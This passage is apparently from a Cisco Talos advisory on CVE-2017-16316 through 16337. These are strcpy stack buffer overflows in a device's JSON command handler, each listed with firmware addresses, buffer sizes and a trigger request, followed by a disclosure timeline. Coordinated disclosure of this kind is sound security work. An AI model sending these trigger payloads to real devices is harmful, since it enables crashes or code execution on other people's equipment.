At 0x9d01c3a0 the value for the s_state key is copied using strcpy to the buffer at $sp+0x2b0. This buffer is 32 bytes large, sending anything longer will cause a buffer overflow.

{"cmd": "s_sonos", "s_state": "OVERFLOW"}

Note: in place of the cmd s_sonos, it's also possible to use g_sonos_players, g_sonos_preset, g_sonos_metadata, g_sonos_groups, g_sonos_bindex, g_sonos_vol.

CVE-2017-16316 - cmd ssonos, gmeta_page key

At 0x9d01c898 the value for the g_meta_page key is copied using strcpy to the buffer at $sp+0x2b0. This buffer is 32 bytes large, sending anything longer will cause a buffer overflow.

{"cmd": "s_sonos", "g_meta_page": "OVERFLOW"}

Note: in place of the cmd s_sonos, it's also possible to use g_sonos_players, g_sonos_preset, g_sonos_metadata, g_sonos_groups, g_sonos_bindex, g_sonos_vol.

CVE-2017-16317 - cmd ssonos, ggroup key

At 0x9d01d068 the value for the g_group key is copied using strcpy to the buffer at $sp+0x2b0. This buffer is 32 bytes large, sending anything longer will cause a buffer overflow.

{"cmd": "s_sonos", "g_group": "OVERFLOW"}

Note: in place of the cmd s_sonos, it's also possible to use g_sonos_players, g_sonos_preset, g_sonos_metadata, g_sonos_groups, g_sonos_bindex, g_sonos_vol.

CVE-2017-16318 - cmd ssonos, ggroup_off key

At 0x9d01d16c the value for the g_group_off key is copied using strcpy to the buffer at $sp+0x2b0. This buffer is 32 bytes large, sending anything longer will cause a buffer overflow.

{"cmd": "s_sonos", "g_group": "0", "g_group_off": "OVERFLOW"}

Note: in place of the cmd s_sonos, it's also possible to use g_sonos_players, g_sonos_preset, g_sonos_metadata, g_sonos_groups, g_sonos_bindex, g_sonos_vol.

Note: "g_group" can be either "0" or "00"

CVE-2017-16319 - cmd ssonos, gsonos_index key

At 0x9d01d7a8 the value for the g_sonos_index key is copied using strcpy to the buffer at $sp+0x1b4. This buffer is 8 bytes large, sending anything longer will cause a buffer overflow.

{"cmd": "s_sonos", "g_sonos_index": "OVERFLOW"}

Note: in place of the cmd s_sonos, it's also possible to use g_sonos_players, g_sonos_preset, g_sonos_metadata, g_sonos_groups, g_sonos_bindex, g_sonos_vol.

CVE-2017-16320 - cmd ssonos, ssonos_cmd key

At 0x9d01ddd4 the value for the s_sonos_cmd key is copied using strcpy to the buffer at $sp+0x290. This buffer is 32 bytes large, sending anything longer will cause a buffer overflow.

{"cmd": "s_sonos", "s_sonos_cmd": "OVERFLOW"}

Note: in place of the cmd s_sonos, it's also possible to use g_sonos_players, g_sonos_preset, g_sonos_metadata, g_sonos_groups, g_sonos_bindex, g_sonos_vol.

CVE-2017-16321 - cmd ssonos, ssonos_index key

At 0x9d01e050 the value for the s_sonos_index key is copied using strcpy to the buffer at $sp+0x1b4. This buffer is 8 bytes large, sending anything longer will cause a buffer overflow.

{"cmd": "s_sonos", "s_sonos_cmd": "x", "s_sonos_index": "OVERFLOW"}

Note: in place of the cmd s_sonos, it's also possible to use g_sonos_players, g_sonos_preset, g_sonos_metadata, g_sonos_groups, g_sonos_bindex, g_sonos_vol.

CVE-2017-16322 - cmd ssonos, cgroup key

At 0x9d01e228 the value for the c_group key is copied using strcpy to the buffer at $sp+0x2b0. This buffer is 32 bytes large, sending anything longer will cause a buffer overflow.

{"cmd": "s_sonos", "c_group": "OVERFLOW"}

Note: in place of the cmd s_sonos, it's also possible to use g_sonos_players, g_sonos_preset, g_sonos_metadata, g_sonos_groups, g_sonos_bindex, g_sonos_vol.

CVE-2017-16323 - cmd ssonos, sgroup key

At 0x9d01e2f4 the value for the s_group key is copied using strcpy to the buffer at $sp+0x2b0. This buffer is 32 bytes large, sending anything longer will cause a buffer overflow.

{"cmd": "s_sonos", "s_group": "OVERFLOW"}

Note: in place of the cmd s_sonos, it's also possible to use g_sonos_players, g_sonos_preset, g_sonos_metadata, g_sonos_groups, g_sonos_bindex, g_sonos_vol.

CVE-2017-16324 - cmd ssonos, sgroup_vol key

At 0x9d01e368 the value for the s_group_vol key is copied using strcpy to the buffer at $sp+0x2b0. This buffer is 32 bytes large, sending anything longer will cause a buffer overflow.

{"cmd": "s_sonos", "s_group": "x", "s_group_vol": "OVERFLOW"}

Note: in place of the cmd s_sonos, it's also possible to use g_sonos_players, g_sonos_preset, g_sonos_metadata, g_sonos_groups, g_sonos_bindex, g_sonos_vol.

CVE-2017-16325 - cmd ssonos, sgroup_cmd key

At 0x9d01e3a8 the value for the s_group_cmd key is copied using strcpy to the buffer at $sp+0x2b0. This buffer is 32 bytes large, sending anything longer will cause a buffer overflow.

{"cmd": "s_sonos", "s_group": "x", "s_group_cmd": "OVERFLOW"}

Note: in place of the cmd s_sonos, it's also possible to use g_sonos_players, g_sonos_preset, g_sonos_metadata, g_sonos_groups, g_sonos_bindex, g_sonos_vol.

CVE-2017-16326 - cmd ssonos, snsonos_cmd key

At 0x9d01e5f4 the value for the sn_sonos_cmd key is copied using strcpy to the buffer at $sp+0x2b0. This buffer is 32 bytes large, sending anything longer will cause a buffer overflow.

{"cmd": "s_sonos", "sn_sonos_cmd": "OVERFLOW"}

Note: in place of the cmd s_sonos, it's also possible to use g_sonos_players, g_sonos_preset, g_sonos_metadata, g_sonos_groups, g_sonos_bindex, g_sonos_vol.

CVE-2017-16327 - cmd sinitevent, seventoffset key

At 0x9d01ea88 the value for the s_event_offset key is copied using strcpy to the buffer at $sp+0x2b0. This buffer is 32 bytes large, sending anything longer will cause a buffer overflow.

{"cmd": "s_init_event", "s_event_offset": "OVERFLOW"}

CVE-2017-16328 - cmd seventalarm, seventoffset key

At 0x9d01eb08 the value for the s_event_offset key is copied using strcpy to the buffer at $sp+0x2b0. This buffer is 32 bytes large, sending anything longer will cause a buffer overflow.

{"cmd": "s_event_alarm", "s_event_offset": "OVERFLOW"}

CVE-2017-16329 - cmd seventalarm, seventdelay key

At 0x9d01eb44 the value for the s_event_delay key is copied using strcpy to the buffer at $sp+0x2b0. This buffer is 32 bytes large, sending anything longer will cause a buffer overflow.

{"cmd": "s_event_alarm", "s_event_delay": "OVERFLOW"}

CVE-2017-16330 - cmd seventalarm, seventgroup key

At 0x9d01eb8c the value for the s_event_group key is copied using strcpy to the buffer at $sp+0x2b0. This buffer is 32 bytes large, sending anything longer will cause a buffer overflow.

{"cmd": "s_event_alarm", "s_event_group": "OVERFLOW"}

CVE-2017-16331 - cmd seventalarm, s_tid key

At 0x9d01ebd4 the value for the s_tid key is copied using strcpy to the buffer at $sp+0x2b0. This buffer is 32 bytes large, sending anything longer will cause a buffer overflow.

{"cmd": "s_event_alarm", "s_tid": "OVERFLOW"}

CVE-2017-16332 - cmd seventalarm, s_aid key

At 0x9d01ec34 the value for the s_aid key is copied using strcpy to the buffer at $sp+0x2b0. This buffer is 32 bytes large, sending anything longer will cause a buffer overflow.

{"cmd": "s_event_alarm", "s_aid": "OVERFLOW"}

CVE-2017-16333 - cmd sevent, soffset key

At 0x9d01ed7c the value for the s_offset key is copied using strcpy to the buffer at $sp+0x2b0. This buffer is 32 bytes large, sending anything longer will cause a buffer overflow.

{"cmd": "s_event", "s_offset": "OVERFLOW"}

CVE-2017-16334 - cmd sevent, sraw key

At 0x9d01edb8 the value for the s_raw key is copied using strcpy to the buffer at $sp+0x10. This buffer is 244 bytes large, sending anything longer will cause a buffer overflow.

{"cmd": "s_event", "s_offset": "x", "s_raw": "OVERFLOW"}

CVE-2017-16335 - cmd seventvar, s_offset key

At 0x9d01ee70 the value for the s_offset key is copied using strcpy to the buffer at $sp+0x2b0. This buffer is 32 bytes large, sending anything longer will cause a buffer overflow.

{"cmd": "s_event_var", "s_offset": "OVERFLOW"}

CVE-2017-16336 - cmd seventvar, s_value key

At 0x9d01eeb0 the value for the s_value key is copied using strcpy to the buffer at $sp+0x10. This buffer is 244 bytes large, sending anything longer will cause a buffer overflow.

{"cmd": "s_event_var", "s_offset": "x", "s_value": "OVERFLOW"}

CVE-2017-16337 - cmd gevent, soffset key

At 0x9d01ef24 the value for the s_offset key is copied using strcpy to the buffer at $sp+0x2b0. This buffer is 32 bytes large, sending anything longer will cause a buffer overflow.

{"cmd": "g_event", "s_offset": "OVERFLOW"}

Timeline

2017-11-27 - Vendor Disclosure
2017-11-28 - Vendor Acknowledged
2018-01-02 - 30 day follow up with vendor for status
2018-01-18 - Vendor advised issues under evaluation
2018-02-12 - 60 day follow up with vendor
2018-03-09 - Vendor advised working on course of action
2018-04-06 - Follow up with vendor on timeline for fix
2018-04-12 - Vendor advised issues addressed & plan for beta testing
2018-06-19 - Public disclosure

Credit

Discovered by Claudio Bozzato of Cisco Talos.